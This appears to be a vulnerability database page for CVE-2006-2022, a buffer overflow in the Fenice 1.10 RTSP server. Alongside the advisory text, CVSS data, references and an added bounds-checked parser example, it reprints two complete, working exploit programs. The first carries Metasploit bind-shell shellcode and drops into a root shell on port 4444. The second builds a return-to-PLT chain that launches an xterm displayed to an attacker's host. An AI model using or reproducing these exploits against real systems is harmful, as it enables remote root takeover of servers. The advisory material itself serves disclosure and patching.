CVE-2006-2022
CVSS 7.5
Published: 2006-04-25 16:06:00
Revised: 2011-03-07 21:34:48

[Original] Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url.c) in Fenice 1.10 and earlier allows remote attackers to execute arbitrary code via a long URL.


[CNNVD] Fenice Remote Overflow and Denial of Service Vulnerabilities (CNNVD-200604-493)

        Fenice is an IETF-standards-compliant multimedia streaming server.
        Fenice's implementation contains buffer overflow vulnerabilities; a remote attacker could exploit them to execute arbitrary instructions on the server or cause a denial of service.
        Fenice's RTSP module uses the parse_url function to extract the server, port and file name from the URI. This function fills the server and file_name buffers supplied by the caller with a series of strcpy calls, with no check against the buffer sizes, which allows an attacker to trigger a buffer overflow and execute malicious instructions.
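
The description above is the whole root cause: the parser copies attacker-controlled URI pieces into fixed-size caller buffers with strcpy. The following is an added example, not Fenice's code and not part of this advisory; it models the parse_url contract (server, port and file name out of an "rtsp://" URI) with bounded copies so that an over-long host or path is refused instead of written past the buffer. The buffer sizes SERVER_MAX and FILE_MAX, the struct rtsp_target type and the result codes are assumptions for the illustration; Fenice's real sizes are not given on this page.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>

/* Constructed buffer sizes for this illustration; the real sizes used in
   Fenice are not stated on this page. */
#define SERVER_MAX 64
#define FILE_MAX   256

struct rtsp_target {
    char server[SERVER_MAX];
    unsigned short port;
    char file_name[FILE_MAX];
};

enum { URL_OK = 0, URL_BAD_SCHEME = -1, URL_BAD_HOST = -2,
       URL_BAD_PORT = -3, URL_TOO_LONG = -4 };

/*
 * Bounded re-implementation of the parse_url contract described above:
 * split "rtsp://server[:port]/file" into server, port and file name.
 * Every copy is checked against the destination size first, so an
 * over-long host or path is refused with URL_TOO_LONG instead of being
 * strcpy'd over the end of the caller's buffers.
 */
int parse_url_bounded(const char *url, struct rtsp_target *out)
{
    static const char scheme[] = "rtsp://";
    const char *p, *slash, *colon, *file;
    size_t auth_len, host_len, file_len;

    if (strncmp(url, scheme, sizeof scheme - 1) != 0)
        return URL_BAD_SCHEME;
    p = url + sizeof scheme - 1;

    /* authority = text up to the first '/', or the whole remainder */
    slash = strchr(p, '/');
    auth_len = slash ? (size_t)(slash - p) : strlen(p);

    /* optional ":port" inside the authority */
    colon = memchr(p, ':', auth_len);
    host_len = colon ? (size_t)(colon - p) : auth_len;

    if (host_len == 0)
        return URL_BAD_HOST;
    if (host_len >= SERVER_MAX)            /* leave room for the NUL */
        return URL_TOO_LONG;
    memcpy(out->server, p, host_len);
    out->server[host_len] = '\0';

    out->port = 554;                        /* RTSP default port */
    if (colon) {
        char *end;
        unsigned long v;
        /* digits only, running exactly to the end of the authority, 1..65535 */
        if (colon[1] < '0' || colon[1] > '9')
            return URL_BAD_PORT;
        errno = 0;
        v = strtoul(colon + 1, &end, 10);
        if (errno || end != p + auth_len || v == 0 || v > 65535)
            return URL_BAD_PORT;
        out->port = (unsigned short)v;
    }

    /* file name = everything after the '/', possibly empty */
    file = slash ? slash + 1 : "";
    file_len = strlen(file);
    if (file_len >= FILE_MAX)
        return URL_TOO_LONG;
    memcpy(out->file_name, file, file_len + 1);
    return URL_OK;
}

/* Feed the parser a URL whose path is 320 bytes, the length the advisory
   text on this page cites as enough to trigger the overflow, and return
   the result code. A bounded parser must reject it rather than copy it. */
int demo_overlong_url(void)
{
    char url[400];
    struct rtsp_target t;
    size_t n = strlen("rtsp://h/");
    memcpy(url, "rtsp://h/", n);
    memset(url + n, 'a', 320);
    url[n + 320] = '\0';
    return parse_url_bounded(url, &t);
}

int main(void)
{
    struct rtsp_target t;
    int rc = parse_url_bounded("rtsp://media.example.net:8554/movie.mov", &t);
    printf("rc=%d server=%s port=%u file=%s\n", rc, t.server, t.port, t.file_name);
    printf("320-byte path -> rc=%d (URL_TOO_LONG is %d)\n",
           demo_overlong_url(), URL_TOO_LONG);
    return 0;
}
```

The design point is that the length check happens before the copy and the rejection is a distinct return code, so the RTSP layer can answer with an error status and keep serving other clients rather than crashing or executing attacker-supplied data.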

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2022
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2022
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-493
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/1491
(UNKNOWN)  VUPEN  ADV-2006-1491
http://www.securityfocus.com/bid/17678
(UNKNOWN)  BID  17678
http://www.securityfocus.com/archive/1/archive/1/431870/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060423 Buffer-overflow and crash in Fenice OMS 1.10
http://secunia.com/advisories/19770
(VENDOR_ADVISORY)  SECUNIA  19770
http://xforce.iss.net/xforce/xfdb/26078
(UNKNOWN)  XF  fenice-parseurl-bo(26078)
http://www.securityfocus.com/archive/1/archive/1/436256/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060607 Re: Buffer-overflow and crash in Fenice OMS 1.10
http://www.securityfocus.com/archive/1/archive/1/432002/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060425 Fenice - Open Media Streaming Server remote BOF exploit
http://securityreason.com/securityalert/794
(UNKNOWN)  SREASON  794
http://aluigi.altervista.org/adv/fenicex-adv.txt
(UNKNOWN)  MISC  http://aluigi.altervista.org/adv/fenicex-adv.txt

- Vulnerability information

Fenice Remote Overflow and Denial of Service Vulnerabilities
High risk  Buffer overflow
2006-04-25 00:00:00 2013-01-08 00:00:00
Remote

- Announcements and patches

        The vendor has not yet provided a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:
        http://streaming.polito.it/server

- Vulnerability information (1717)

Fenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit (EDBID:1717)
linux remote
2006-04-25 Verified
0 c0d3r
/*
	IHS Iran Homeland Security public source code
	Fenice - Open Media Streaming Server remote BOF exploit
	author : c0d3r "kaveh razavi" c0d3r@ihsteam.com
	package : fenice-1.10.tar.gz and prolly prior versions
	workaround : update after patch release
	advisory : http://www.securityfocus.com/bid/17678
	company address : http://streaming.polito.it/server
	timeline :
	23 Apr 2006 : vulnerability reported by Luigi Auriemma
	25 Sep 2006 : IHS exploit released 
	exploit features :
	1) a global offset 
	2) reliable metasploit shellcode 
	3) autoconnect to shell
	bad chars  : 0x00 0x05 encoder : PexAlphaNum 
	compiled with gcc under Linux : gcc fenice.c -o fenice 

  **************************************************************
	 
	Exploitation Method : linux-gate.so.1
	 
	the reference written by izik could be downloaded from milw0rm.
	after some research I realized that the offset is very stable
	around 2.6 kernels compiled from source. the VA patch will
	easily get bypassed. if you want to exploit 2.4 kernels 
	you can jump directly to the shellcode , there isn't any
	stack randomization for sure in 2.4.* by default.
	the offset on 2.6.13.2 and 2.6.15.6 compiled with amd64 flag
	(slackware 10.2), also on 2.6.15.4 compiled with i386 flag 
	(Fedora core 2) was same. on default installation of fc3 the
	linux-gate.so.1 has null at the first , so think of another 
	way to jump to the shellcode.

  **************************************************************

	greeting to :

	www.ihsteam.com       the team , LorD and NT 
	www.ihsteam.net       english version ,
	www.c0d3r.org         my home :)
	www.underground.ir    friends who are participating in the forums
	www.exploitdev.com    Jamie and Ben , those times are now legend
	www.milw0rm.com       str0ke , keep the good job going

/*
/*

[c0d3r]$ gcc fenice.c -o fenice
[c0d3r]$ ./fenice 127.0.0.1 554 0

-------- fenice - Open Media Streaming Project remote BOF exploit
-------- copyrighted by c0d3r of IHS 2006

[+] Targeting slackware 10.2
[+] Shellcode size : 329 bytes
[+] Building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 750 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully to 127.0.0.1
[+] trying to get shell
[+] connecting to 127.0.0.1 on port 4444
[+] target exploited successfully
[+] Dropping into shell

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
Linux c0d3r 2.6.15.6 #4 SMP PREEMPT Sat Apr 15 23:22:34 AKDT 2006 i686 unknown unknown GNU/Linux


*/



#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>   /* sleep, usleep, read, write */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#define inc 0x41
#define size 750


void gotshell(int new_sock);
void usage();

// metasploit.com shellcode - badchars = 0x00 0x05
// linux_ia32_bind -  LPORT=4444 Size=329 Encoder=PexAlphaNum
// I had a bit of difficulty executing my shellcode because some chars
// were badly interpreted by fenice; anyway, viva metasploit!

unsigned char shellcode[] =

"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff"
"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56"
"\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58"
"\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44"
"\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d"
"\x41\x43\x4b\x4d\x43\x45\x43\x54\x43\x45\x4c\x56\x44\x50\x4c\x36"
"\x48\x36\x4a\x55\x49\x49\x49\x58\x41\x4e\x4d\x4c\x42\x58\x48\x49"
"\x43\x54\x44\x45\x48\x36\x4a\x46\x41\x41\x4e\x35\x48\x36\x43\x35"
"\x49\x38\x41\x4e\x4c\x46\x48\x46\x4a\x35\x42\x35\x41\x35\x48\x45"
"\x49\x48\x41\x4e\x4d\x4c\x42\x48\x42\x4b\x48\x36\x41\x4d\x43\x4e"
"\x4d\x4c\x42\x58\x44\x45\x44\x55\x48\x45\x43\x54\x49\x38\x41\x4e"
"\x42\x4b\x48\x46\x4d\x4c\x42\x58\x43\x59\x4c\x56\x44\x30\x49\x55"
"\x42\x4b\x4f\x33\x4d\x4c\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b"
"\x4b\x30\x44\x55\x4a\x46\x4f\x52\x4f\x32\x43\x47\x4a\x46\x4a\x56"
"\x4f\x42\x44\x56\x49\x36\x50\x36\x49\x48\x43\x4e\x44\x55\x43\x55"
"\x49\x58\x41\x4e\x4d\x4c\x42\x48\x5a";

char slack     [] = "\x77\xe7\xff\xff"; // slackware 10.2 2.6.15.6 
char FC2_2_6_15[] = "\x77\xe7\xff\xff";	// Fedora core 2 , 2.6.15.4
char debug     [] = "\xdd\xdd\xdd\xdd";	// debugging purpose
char ret[4];
char get [] = "\x47\x45\x54\x20\x2f";
struct hostent *hp;
struct sockaddr_in con;
unsigned int rc,rc2,len=16,sock,sock2,os,addr,port;
char buffer[size];

// gotshell is from jamie (darkdud3) remote exploit sample 
// with a bit change

void gotshell(int sock){

	fd_set fd_read;
	char buff[1024];
	char cmd[100] = "id;uname -a\n";
	int n;

	FD_ZERO(&fd_read);
	FD_SET(sock, &fd_read);
	FD_SET(0, &fd_read);
	send(sock, cmd, strlen(cmd), 0);
	while(1) {
		FD_SET(sock,&fd_read);
		FD_SET(0,&fd_read);
		if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
		if( FD_ISSET(sock, &fd_read) ) {
			if((n=recv(sock,buff,sizeof(buff),0))<0){
			fprintf(stderr, "EOF\n");
			exit(2);
			}
			if(write(1,buff,n)<0)break;
		}
		if ( FD_ISSET(0, &fd_read) ) {
			if((n=read(0,buff,sizeof(buff)))<0){
				fprintf(stderr,"EOF\n");
				exit(2);
			}
			if(send(sock,buff,n,0)<0) break;
		}
		usleep(10);
	}
	fprintf(stderr,"Connection aborted, select failed()\n");
	exit(0);
}

void usage(char *arg){
	printf("-------- usage    : %s host_or_ip port target\n",arg);
	printf("-------- example  : %s localhost 554 0\n",arg);
	printf("-------- target 0 : slackware 10.2 linux-2.6.15.6     : 0\n");
	printf("-------- target 1 : Fedora core 2  linux-2.6.15.4     : 1\n");
	printf("-------- target 2 : debug			      : 2\n\n");
	exit(-1) ;
}

int main(int argc,char **argv){

	printf("\n-------- fenice - Open Media Streaming Project remote BOF exploit\n");
	printf("-------- copyrighted by c0d3r of IHS 2006\n\n");
	if(argc != 4)
		usage(argv[0]);
	os = (unsigned short)atoi(argv[3]);
	switch(os){
		case 0:
		strcat(ret,slack);
		printf("[+] Targeting slackware 10.2\n");
		break;
		case 1:
		strcat(ret,FC2_2_6_15);
		printf("[+] Targeting fedora core 2 \n");
		break;
		case 2:
		strcat(ret,debug); 
		printf("[+] Debugging\n");
		break;
		default:
		printf("\n[-] This target doesnt exist in the list\n\n");

	exit(-1);
	}
	printf("[+] Shellcode size : %d bytes\n",sizeof(shellcode)-1);
	printf("[+] Building overflow string\n");

	// heart of exploit

	memset(buffer,inc,size);
	memcpy(buffer,get,5);
	memcpy(buffer+5+361,ret,4);
	memcpy(buffer+5+361+4+10,shellcode,sizeof(shellcode)-1);
	buffer[size] = 0;

	// EO heart of exploit

	hp = gethostbyname(argv[1]);
	if (!hp)
		addr = inet_addr(argv[1]);
	if ((!hp)  && (addr == INADDR_NONE) ){
		printf("[-] unable to resolve %s\n",argv[1]);
		exit(-1);
	}
	sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	if (!sock){ 
		printf("[-] socket() error...\n");
		exit(-1);
	}
	if (hp != NULL)
		memcpy(&(con.sin_addr),hp->h_addr,hp->h_length);
	else
		con.sin_addr.s_addr = addr;
	if (hp)
		con.sin_family = hp->h_addrtype;
	else
		con.sin_family = AF_INET;
	port=atoi(argv[2]);
	con.sin_port=htons(port);
	printf("[+] attacking host %s\n" , argv[1]) ;
	sleep(1);
	printf("[+] packet size = %d byte\n" , sizeof(buffer));
	rc=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));
	if(!rc){
		sleep(1) ;
		printf("[+] connected\n") ;
		printf("[+] sending the overflow string\n") ;
		send(sock,buffer,strlen(buffer),0);
		send(sock,"\n",1,0);
		sleep(1) ;
		send(sock,"\n",1,0);
		sleep(1) ;
		printf("[+] exploit sent successfully to %s \n" , argv[1]);
		printf("[+] trying to get shell\n");
		printf("[+] connecting to %s on port 4444\n",argv[1]);
		sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
		if (!sock){ 
			printf("[-] socket() error...\n");
			exit(-1);
		}
		con.sin_family = AF_INET;
		con.sin_port=htons(4444);
		rc2=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));
		if(rc2 != 0) {
		printf("[-] exploit probably failed\n");
		exit(-1);
		}
		if(!rc2){
			printf("[+] target exploited successfully\n");
			printf("[+] Dropping into shell\n\n");
			gotshell(sock);
		}
	}
}

// milw0rm.com [2006-04-25]
		

- Vulnerability information (3815)

Fenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield) (EDBID:3815)
linux remote
2007-04-29 Verified
0 Xpl017Elz
/*
**
** Fedora Core 6 (exec-shield) based
** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit
** by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/17678
** vendor: http://streaming.polito.it/legacy_server
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** This is a very common standalone daemon remote buffer overflow vulnerability.
** I used the method that I used on my proftpd exploit again to avoid random mapping library.
** And I'm planning to publish it in English.
**
** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt
**
** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more.
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>    /* memset, strlen, strncpy, sprintf helpers */
#include <strings.h>   /* bzero */
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>


#define UNAME_PLT 0x8048e9c // <uname@plt> // used to obtain the randomly mapped byte (execle()>>16)&0xff from the GOT

#define STRCPY_PLT 0x08048ffc // <strcpy@plt>
#define MOVE_ESP 0x80569e5 // <__do_global_ctors_aux+37>:   pop    %ebx // moves a total of 12 bytes including ret (nergal's idea)

#define GETGID_GOT 0x8059234 // GOT slot into which the execle() function address is assembled piece by piece
/*
	(gdb) x/x 0x8059234
	0x8059234 <_GLOBAL_OFFSET_TABLE_+324>:  0x08049222
	(gdb) x 0x08049222
	0x8049222 <getgid@plt+6>:       0x00027068
	(gdb)
*/
#define GETGID_PLT	0x0804921c // <getgid@plt> // after the GOT slot is assembled, execle() is reached through this PLT entry


#define EXECLE_16_0xff	0x8059156 // (execle()>>16)&0xff // 1 byte taken from the uname function: 0x!!0000
#define EXECLE_08_0xff	0x80591b5 // (execle()>>8)&0xff // 1 byte taken from the bind function: 0x00!!00
#define EXECLE_00_0xff	0x8048e83 // (execle()>>0)&0xff // the remaining static byte: 0x0000!!


/* not needed if a statically accessible buffer exists */
#define DATA_LOC 0x805af4c // uses free space in the heap


/* /usr/X11R6/bin/xterm */
#define ARG1_LOC	0x805af4c // start address of the assembled command (used as argv[0] and argv[1])
#define SLASH_STR	0x8055acb // "/"
#define XTERM_STR_1	0x804875d // "us"
#define XTERM_STR_2	0x80585ce // "r/"
#define X_STR_1		0x8048df3 // "X"
#define R_STR		0x804a572 // "R"
#define XTERM_STR_3	0x804882c // "bin"
#define X_STR_2		0x8048e33 // "x"
#define XTERM_STR_4	0x8056a33 // "term"


/* -display */
#define ARG2_LOC	0x805af61 // start address of the assembled option (used as argv[2])
#define DISPLAY_OPTION	0x80584b8 // "-di"


/* xhost_ip:0 */
#define ARG3_LOC	0x805af65 // start address of the assembled xhost IP (used as argv[3])
#define NUM_0		0x8053285 // "0"
#define NUM_1		0x804ef17 // "1"
#define NUM_2		0x804b37b // "2"
#define NUM_3		0x804d622 // "3"
#define NUM_4		0x804e583 // "4"
#define NUM_5		0x80554d7 // "5"
#define NUM_6		0x8052341 // "6"
#define NUM_7		0x804d14a // "7"
#define NUM_8		0x8048db3 // "8"
#define NUM_9		0x80516bb // "9"


#define COLON_STR 0x8057abb // ":"
#define NULL_STR 0x805afbe // 0x00000000


int main(int argc,char *argv[]){
	int i=0,j=0;
	struct hostent *se;
	struct sockaddr_in saddr;
	unsigned long ip,ip1,ip2,ip3,ip4;
	unsigned char do_ex[4096];
	unsigned char xhost_ip[256];
	int sock;
	char host[256];
	int port=554;

	memset((char *)do_ex,0,sizeof(do_ex));
	ip=ip1=ip2=ip3=ip4=0;


	printf("/*\n**\n** Fedora Core 6 (exec-shield) based\n"
		"** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\n"
		"** by Xpl017Elz\n**\n");
	if(argc<2){
		printf("** Usage: %s [host] [port] [xhost ip]\n",argv[0]);
		printf("**\n** host: Fenice 1.10 Open Media Streaming Server\n");
		printf("** port: default 554\n");
		printf("** xhost ip: attacker xhost\n**\n");
		printf("** Example: %s fenice.omss.co.kr 554 82.82.82.82\n**\n*/\n",argv[0]);
		exit(-1);
	}
	else {
		sscanf(argv[3],"%lu.%lu.%lu.%lu",&ip1,&ip2,&ip3,&ip4);
#define IP1 16777216
#define IP2 65536
#define IP3 256
		ip=0;
		ip+=ip1 * (IP1);
		ip+=ip2 * (IP2);
		ip+=ip3 * (IP3);
		ip+=ip4;

		memset((char *)xhost_ip,0,256);
		sprintf(xhost_ip,"%10lu",ip);
	}

	memset((char *)host,0,sizeof(host));
	strncpy(host,argv[1],sizeof(host)-1);
	port=atoi(argv[2]);

	se=gethostbyname(host);
	if(se==NULL){
		printf("** gethostbyname() error\n**\n*/\n");
		return -1;
	}
	sock=socket(AF_INET,SOCK_STREAM,0);
	if(sock==-1){
		printf("** socket() error\n**\n*/\n");
		return -1;
	}

	saddr.sin_family=AF_INET;
	saddr.sin_port=htons(port);
	saddr.sin_addr=*((struct in_addr *)se->h_addr);
	bzero(&(saddr.sin_zero),8);


	printf("** make exploit\n");
	sprintf(do_ex,"GET /");
	j=strlen(do_ex);
	for(i=0;i<320;i++,j++){
		sprintf(do_ex+j,"A");
	}

#define __GOGOSSING(dest,index,src){\
	*(long *)&dest[index]=src;\
	index+=4;\
}

	__GOGOSSING(do_ex,j,UNAME_PLT); /* fill in the uname GOT value */
	// assemble the execle() address
	{
		i=0;
		/* (execle()>>0)&0xff */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,GETGID_GOT+i++);
		__GOGOSSING(do_ex,j,EXECLE_00_0xff);
		/* (execle()>>8)&0xff */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,GETGID_GOT+i++);
		__GOGOSSING(do_ex,j,EXECLE_08_0xff);
		/* (execle()>>16)&0xff */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,GETGID_GOT+i++);
		__GOGOSSING(do_ex,j,EXECLE_16_0xff);
	}
	// argv[0],argv[1]: /usr/X11R6/bin/xterm
	{
		i=0;
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,SLASH_STR);
		i+=1; /* "/" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,XTERM_STR_1);
		i+=2; /* "us" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,XTERM_STR_2);
		i+=2; /* "r/" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,X_STR_1);
		i+=1; /* "X" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NUM_1);
		i+=1; /* "1" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NUM_1);
		i+=1; /* "1" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,R_STR);
		i+=1; /* "R" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NUM_6);
		i+=1; /* "6" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,SLASH_STR);
		i+=1; /* "/" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,XTERM_STR_3);
		i+=3; /* "bin" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,SLASH_STR);
		i+=1; /* "/" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,X_STR_2);
		i+=1; /* "x" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,XTERM_STR_4);
		i+=4; /* "term" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NULL_STR);
		i+=1; /* null */
	}
	// argv[2]: -display
	{
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,DISPLAY_OPTION);
		i+=3; /* "-di" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NULL_STR);
		i+=1; /* null */
	}
	// argv[3]: xhost_ip:0
	for(ip=0;ip<10;ip++){
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);

		switch(xhost_ip[ip]){
			case '0':
				__GOGOSSING(do_ex,j,NUM_0);
				break;
			case '1':
				__GOGOSSING(do_ex,j,NUM_1);
				break;
			case '2':
				__GOGOSSING(do_ex,j,NUM_2);
				break;
			case '3':
				__GOGOSSING(do_ex,j,NUM_3);
				break;
			case '4':
				__GOGOSSING(do_ex,j,NUM_4);
				break;
			case '5':
				__GOGOSSING(do_ex,j,NUM_5);
				break;
			case '6':
				__GOGOSSING(do_ex,j,NUM_6);
				break;
			case '7':
				__GOGOSSING(do_ex,j,NUM_7);
				break;
			case '8':
				__GOGOSSING(do_ex,j,NUM_8);
				break;
			case '9':
				__GOGOSSING(do_ex,j,NUM_9);
				break;
		}
		i+=1;
	}
	{
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,COLON_STR);
		i+=1; /* ":" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NUM_0);
		i+=1; /* "0" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NULL_STR);
		i+=1; /* null */
	}
	// exploit
	{
		__GOGOSSING(do_ex,j,GETGID_PLT); // getgid's GOT entry now holds execle(), so it can be reached through the PLT.
		__GOGOSSING(do_ex,j,0x82828282); // not a call, so this fills the slot where the previous function's return %eip would be.
		__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[0] */
		__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[1] */
		__GOGOSSING(do_ex,j,ARG2_LOC); /* argv[2] */
		__GOGOSSING(do_ex,j,ARG3_LOC); /* argv[3] */
	}
	printf("** exploit size: %d\n",strlen(do_ex));

	i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
	if(i==-1){
		printf("** connect() error\n**\n*/\n");
		return -1;
	}
	else {
		printf("** send exploit\n");
		send(sock,do_ex,j,0);

		printf("** sleepppppppp...\n");
		sleep(1);
		send(sock,"\n",1,0);
		send(sock,"\n",1,0);
	}
	close(sock);

	printf("** xhost, check it up, now!\n**\n*/\n");
	exit(0);
}

/* eoc */

// milw0rm.com [2007-04-29]
		

- Vulnerability information

24881
Fenice OMS Server HTTP RTSP Module parse_url Overflow
Location: Remote / Network Access
Attack type: Input Manipulation
Impact: Loss of Integrity
Solution: Upgrade
Classification: Exploit Public, Vendor Verified

- Vulnerability description

A remote overflow exists in Fenice. Fenice fails to check a boundary error when parsing a RTSP URL resulting in a buffer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code resulting in a loss of integrity.

- Timeline

Disclosure date: 2006-04-23
Discovery date: Unknown
Exploit publish date: 2006-04-25
Solution date: 2006-06-06

- Solution

Upgrade to version 1.11 (svn r353 - 2006-06-06) or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Vulnerability information

Fenice Remote Buffer Overflow and Denial Of Service Vulnerabilities
Class: Unknown   Bugtraq ID: 17678
Remote: Yes   Local: No
Published: 2006-04-24 12:00:00   Updated: 2007-04-30 10:00:00
